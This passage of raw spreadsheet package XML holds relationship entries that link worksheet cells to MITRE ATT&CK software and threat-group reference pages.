Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0413" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0063" TargetMode="External"/><Relationship Id="rId496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0516" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1025" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0089" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0554" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0256" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0254" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0238" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0263" TargetMode="External"/><Relationship Id="rId563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0645" TargetMode="External"/><Relationship Id="rId619" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0248" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0338" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0361" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0499" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0629" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0387" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1042" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0640" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0465" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0213" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0247" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0664" TargetMode="External"/><Relationship Id="rId532" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0678" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0161" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0679" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0203" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0395" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0375" TargetMode="External"/><Relationship Id="rId476" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0345" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0069" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0200" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0121" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0368" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0058" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0452" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0077" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0038" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0277" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1031" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1032" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0412" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0073" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0231" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0358" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0623" TargetMode="External"/><Relationship Id="rId610" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0385" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0167" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0084" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0264" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0096" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0093" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0674" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0082" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0139" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0109" TargetMode="External"/><Relationship Id="rId596" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0095" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0588" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0391" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0526" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0496" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0692" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0374" TargetMode="External"/><Relationship Id="rId621" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/table" Target="../tables/table5.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0584" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0115" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0607" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0590" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0467" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0521" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0126" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0497" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0216" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0206" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0181" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0170" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0364" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0559" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0362" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0344" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0222" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0281" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0691" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0122" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0266" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0117" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0182" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0537" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0124" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0592" TargetMode="External"/><Relationship Id="rId601" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0278" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0015" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0639" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0657" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0030" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0591" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0010" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0165" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0380" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0130" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0202" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0552" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0024" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0410" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0685" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0269" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0446" TargetMode="External"/><Relationship Id="rId612" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0006" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0156" TargetMode="External"/><Relationship Id="rId489" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0468" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0337" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0459" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0080" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0594" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0586" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0219" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0020" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0538" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0363" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0477" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0617" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0145" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0003" TargetMode="External"/><Relationship Id="rId598" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0008" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0698" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0218" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0456" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0635" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0437" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0034" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0057" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0466" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0608" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0334" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0618" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1050" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1040" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0578" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0245" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1022" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0680" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0039" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0140" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0001" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0212" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0695" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0696" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0352" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0388" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0632" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0428" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0174" TargetMode="External"/><Relationship Id="rId603" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0100" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0044" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0443" TargetMode="External"/><Relationship Id="rId491" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1035" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S1034" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0415" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0335" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0492" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0605" TargetMode="External"/><Relationship Id="rId547" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0386" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0471" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0667" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0417" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0072" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0194" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0262" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0461" TargetMode="External"/><Relationship Id="rId614" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0111" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0232" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0088" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0530" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0553" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0159" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0560" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0239" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0625" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0353" TargetMode="External"/><Relationship Id="rId558" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0670" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0063" TargetMode="External"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0028" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0143" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G1011" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0120" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0125" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0119" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0129" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0071" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0092" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/groups/G0045" TargetMode="External"/><Relationship Id="rId16" 